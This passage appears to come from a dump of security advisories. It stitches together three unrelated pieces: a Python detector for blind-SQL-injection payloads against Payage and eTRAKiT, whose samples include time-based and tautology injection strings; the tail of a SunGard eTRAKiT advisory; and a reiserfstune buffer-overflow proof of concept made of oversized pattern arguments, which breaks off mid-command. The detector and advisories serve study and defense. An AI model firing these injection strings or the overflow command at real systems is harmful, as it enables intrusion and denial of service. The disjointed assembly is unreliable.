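One detection that covers both blind-SQLi shapes on this page, as an added example belonging to neither advisory: it pulls the aid parameter out of a Payage-style query string and the valueAsString field out of the JSON carried by eTRAKiT's ucLogin_txtLoginId_ClientStat parameter, then flags the time-based (SLEEP, WAITFOR DELAY) and quote-breaking tautology patterns the payloads above rely on, and notes when valueAsString no longer matches lastSetTextBoxValue, as in the step 7 payload. Parameter and field names are the advisories'; the indicator names, the benign samples and the btnLogin field are constructed.

```python
"""Blind-SQLi indicators for the Payage 'aid' parameter and the eTRAKiT login JSON.

Added example, not part of either advisory. Parameter and field names are the
advisories'; sample requests, indicator names and the btnLogin field are constructed.
"""
import json
import re
from typing import Dict, List
from urllib.parse import parse_qs, quote

# Each indicator names one shape the sqlmap payloads above rely on.
INDICATORS = {
    "quote-break":       re.compile(r"'\s*(?:and|or)\b", re.I),                 # 1001' AND ...
    "string-tautology":  re.compile(r"'(\w+)'\s*=\s*'\1\b", re.I),              # 'dCgx'='dCgx
    "numeric-tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),  # AND 6552=6552
    "mysql-sleep":       re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),          # SLEEP(5)
    "mssql-waitfor":     re.compile(r"\bwaitfor\s+delay\s*'", re.I),            # waitfor delay'0:0:10'
    "comment-tail":      re.compile(r"(?:--|/\*)\s*$"),                         # trailing --
}


def sqli_indicators(value: str) -> List[str]:
    """Names of every indicator that matches value, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def check_query_string(query: str) -> Dict[str, List[str]]:
    """Map each query parameter that carries indicators to their names (Payage's GET)."""
    findings = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        hits = sqli_indicators(values[0])
        if hits:
            findings[name] = hits
    return findings


CLIENT_STATE_PARAM = "ucLogin_txtLoginId_ClientStat"
TEXT_FIELDS = ("valueAsString", "lastSetTextBoxValue", "validationText")


def check_client_state(state_json: str) -> Dict[str, List[str]]:
    """Indicators per text field of the login box's JSON client state."""
    state = json.loads(state_json)
    findings = {}
    for field in TEXT_FIELDS:
        hits = sqli_indicators(str(state.get(field, "")))
        if hits:
            findings[field] = hits
    # In the advisory's payload only valueAsString was edited, so the two fields
    # differ; an untouched submission is assumed to keep them equal.
    if state.get("valueAsString") != state.get("lastSetTextBoxValue"):
        findings.setdefault("valueAsString", []).append("state-mismatch")
    return findings


def check_login_post(body: str) -> Dict[str, List[str]]:
    """Run check_client_state on the JSON carried by an eTRAKiT login POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    return check_client_state(fields.get(CLIENT_STATE_PARAM, ["{}"])[0])


# --- constructed samples, built from the payloads quoted above ---------------
PAYAGE_BOOLEAN = ("option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx"
                  "&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=")
PAYAGE_TIME = ("option=com_payage&task=make_payment"
               "&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL"
               "&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=")
PAYAGE_BENIGN = ("option=com_payage&task=make_payment&aid=1001"
                 "&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=")

ETRAKIT_INJECTED = ('{"enabled":true,"emptyMessage":"Username","validationText":"fakeuser",'
                    '"valueAsString":"fakeuser\';waitfor delay\'0:0:10\'--",'
                    '"lastSetTextBoxValue":"fakeuser"}')
ETRAKIT_BENIGN = ('{"enabled":true,"emptyMessage":"Username","validationText":"alice",'
                  '"valueAsString":"alice","lastSetTextBoxValue":"alice"}')
ETRAKIT_POST = CLIENT_STATE_PARAM + "=" + quote(ETRAKIT_INJECTED) + "&btnLogin=Login"

if __name__ == "__main__":
    print(check_query_string(PAYAGE_BOOLEAN))
    print(check_query_string(PAYAGE_TIME))
    print(check_login_post(ETRAKIT_POST))
```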
Solution
================
"SunGard Public Sector appreciates that this issue has been brought to our attention. Our development team has addressed this report with a patch release. Please contact the SunGard Public Sector TRAKiT Solutions division to request the patch release. (858) 451-3030." -- (https://www.kb.cert.org/vuls/id/846103)
Timeline
================
2016-10-17: Discovered
2016-12-6: CVE Issued
Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
[+] Title: reiserfstune 3.6.25 - Local Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A
- Download -
http://www.linuxfromscratch.org/blfs/view/svn/postlfs/reiserfs.html
- Description -
reiserfstune is used for tuning the ReiserFS. It can change two journal
parameters (the journal size and the maximum transaction size), and it
can move the journal’s location to a new specified block device. (The
old ReiserFS’s journal may be kept unused, or discarded at the user’s
option.) Besides that reiserfstune can store the bad block list to the
ReiserFS and set UUID and LABEL. Note: At the time of writing the
relocated journal was implemented for a special release of ReiserFS,
and was not expected to be put into the mainstream kernel until approximately
Linux 2.5. This means that if you have the stock kernel you
must apply a special patch. Without this patch the kernel will refuse
to mount the newly modified file system. We will charge $25 to explain
this to you if you ask us why it doesn’t work.
Perhaps the most interesting application of this code is to put the
journal on a solid state disk.
device is the special file corresponding to the newly specified block
device (e.g. /dev/hdXX for an IDE disk partition or /dev/sdXX for
the SCSI disk partition).
- POC -
/sbin/reiserfstune '-j' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-o' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-s' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-t' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-b' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-B' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-u' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-l' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-f' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-c' 
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-a' 
